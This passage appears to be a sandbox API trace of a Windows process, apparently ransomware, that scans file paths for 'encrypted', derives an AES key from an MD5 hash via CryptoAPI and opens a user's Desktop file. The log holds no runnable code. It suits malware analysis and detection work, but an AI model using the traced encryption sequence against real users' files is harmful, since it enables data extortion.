lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ClVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lVeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VeU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eU\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="U\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hGD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GD17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.672] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="17PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7PyT.gif\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.673] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.673] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.673] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.673] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.673] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.673] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.673] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.673] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.673] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x162ba4e0, ftCreationTime.dwHighDateTime=0x1d5ba1b, ftLastAccessTime.dwLowDateTime=0x23f0900, ftLastAccessTime.dwHighDateTime=0x1d5c316, ftLastWriteTime.dwLowDateTime=0x23f0900, ftLastWriteTime.dwHighDateTime=0x1d5c316, nFileSizeHigh=0x0, nFileSizeLow=0xbf70, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="hGD17PyT.gif", cAlternateFileName="")) returned 0x7c2100 [0030.673] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.673] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.673] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.673] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.673] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.674] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.674] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.674] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.674] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.674] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.674] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.674] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.674] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.674] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0030.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.674] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0030.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.675] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.675] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.675] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.675] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.675] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.676] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.676] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.676] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.676] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.676] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.677] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.677] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.677] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.677] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.677] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.677] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.678] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.678] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0030.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.678] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0030.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.678] CryptDestroyHash (hHash=0x7c2240) returned 1 [0030.678] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.678] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\ClVeU\\hGD17PyT.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\clveu\\hgd17pyt.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.678] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.678] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.678] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.679] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0030.679] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0030.679] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.679] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 